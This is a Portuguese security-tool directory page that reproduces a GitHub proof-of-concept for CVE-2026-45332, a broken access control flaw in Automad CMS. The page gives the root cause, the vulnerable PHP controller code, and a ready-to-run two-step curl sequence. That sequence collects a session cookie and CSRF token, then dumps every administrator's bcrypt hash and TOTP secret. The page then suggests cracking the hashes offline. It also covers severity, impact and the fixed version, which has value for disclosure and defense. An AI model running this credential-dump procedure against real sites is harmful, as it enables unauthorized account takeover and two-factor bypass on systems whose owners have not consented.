Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/lorenzocamilli/cve-2026-45332-poc
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de PenetraçãoAutenticaçãoRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHublorenzocamilli/cve-2026-45332-poc

CVE-2026-45332-PoC

Exploit de prova de conceito para CVE-2026-45332, um controle de acesso quebrado no Automad CMS que permite a extração não autenticada de hashes bcrypt de administradores e segredos TOTP.

Ver Repositório
3há 3 mesesAinda não revisado

CVE-2026-45332: Controle de Acesso Quebrado no Automad CMS

Prova de conceito para CVE-2026-45332, uma vulnerabilidade de Controle de Acesso Quebrado no Automad CMS que permite que qualquer atacante não autenticado obtenha o hash de senha bcrypt e o segredo TOTP de todas as contas de administrador por meio do endpoint de configuração, que nunca é desabilitado após a configuração inicial.

CampoValor
CVECVE-2026-45332
GHSAGHSA-xm76-r88j-vm3g
ProdutoAutomad CMS (composer automad/automad)
Afetado>= 2.0.0-alpha.1, <= 2.0.0-beta.27
Corrigido2.0.0-beta.28
CVSS 3.17.5 Alta (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWECWE-200 (Exposição de Informações Sensíveis), CWE-306 (Ausência de Autenticação para Função Crítica)
PesquisadorLorenzo Camilli

Resumo

O Automad é um CMS PHP baseado em arquivos. O endpoint de configuração responsável por criar a primeira conta de administrador, /_api/user-collection/create-first-user, é registrado como uma rota de API permanentemente pública. Não existe nenhuma proteção que o encerre depois que a configuração inicial é concluída.

Em uma instância ativa e totalmente configurada, um POST não autenticado para este endpoint carrega todo o banco de dados de usuários do disco e o retorna, serializado, no corpo da resposta JSON, incluindo:

  • hashes de senha bcrypt de todas as contas de administrador
  • segredos TOTP (presentes em 2.0.0-beta.27)
  • o caminho absoluto do sistema de arquivos para o diretório de configuração

Nenhuma conta prévia, credencial ou posição especial de rede é necessária.

Causa raiz

A rota está inserida no array $publicAPIRoutes em automad/src/server/Routes.php e é registrada sob a condição AM_PAGE_DASHBOARD, uma constante que é avaliada como a string '/dashboard' e, portanto, é sempre verdadeira. A rota permanece registrada em todas as instalações, inclusive após a conclusão da configuração.

root@kitploit:~
// automad/src/server/Controllers/API/UserCollectionController.php
public static function createFirstUser(): Response {
    $UserCollection = new UserCollection();   // loads ALL existing users from disk
    // ...
    $php = $UserCollection->generatePHP();    // serializes every user including hashes

    return $Response->setData(array(
        'php'       => $php,                  // credential hashes returned in response
        'configDir' => dirname(UserCollection::FILE_ACCOUNTS)  // absolute path leaked
    ));
}

User::__serialize() inclui os campos privados passwordHash e totpSecret, portanto eles acabam embutidos na saída serializada que é retornada ao chamador.

Descrição técnica completa: PoC.md.

Prova de conceito

O endpoint requer um token CSRF válido e um cookie de sessão do Automad, ambos obtidos livremente na página pública de login. Reprodução:

root@kitploit:~
# 1. Grab a session cookie and the CSRF token from the public login page
JAR=$(mktemp)
CSRF=$(curl -sc "$JAR" http://localhost:80/dashboard/login \
  | grep -oP '(?<=<meta name="csrf" content=")[^"]+')

# 2. Dump the credential store
curl -s -b "$JAR" -X POST 'http://localhost:80/_api/user-collection/create-first-user' \
  --data-urlencode "__csrf__=$CSRF" \
  --data-urlencode 'username=dummy' \
  --data-urlencode 'password1=AnyPassword1!' \
  --data-urlencode 'password2=AnyPassword1!' \
  --data-urlencode '[email protected]' | jq .

A resposta contém o hash bcrypt e o segredo TOTP de cada administrador registrado, além do caminho absoluto da configuração:

root@kitploit:~
{
  "code": 200,
  "data": {
    "php": "<?php ... \"passwordHash\";s:60:\"$2y$10$<ADMIN_HASH>\" ... \"totpSecret\";s:N:\"<TOTP_SECRET>\" ...",
    "filename": "accounts.php",
    "configDir": "/path/to/config"
  }
}

Os hashes bcrypt podem então ser quebrados offline (Hashcat / John). Na versão 2.0.0-beta.27, o segredo TOTP vazado ignora completamente a autenticação de dois fatores.

Impacto

Um atacante remoto não autenticado pode:

  1. Recuperar o hash bcrypt de cada administrador e quebrá-lo offline.
  2. Recuperar segredos TOTP e contornar a 2FA (2.0.0-beta.27).
  3. Descobrir o caminho absoluto do sistema de arquivos do servidor, auxiliando ataques adicionais.

Remediação

Atualize para o Automad 2.0.0-beta.28 ou posterior, que restringe o endpoint assim que a configuração inicial for concluída. Como mitigação temporária, bloqueie requisições para /_api/user-collection/create-first-user no servidor web ou no WAF.

Referências

  • CVE.org: CVE-2026-45332
  • GitHub Advisory: GHSA-xm76-r88j-vm3g
  • Automad CMS
  • Controle de Acesso Quebrado (OWASP)
Baixar ferramenta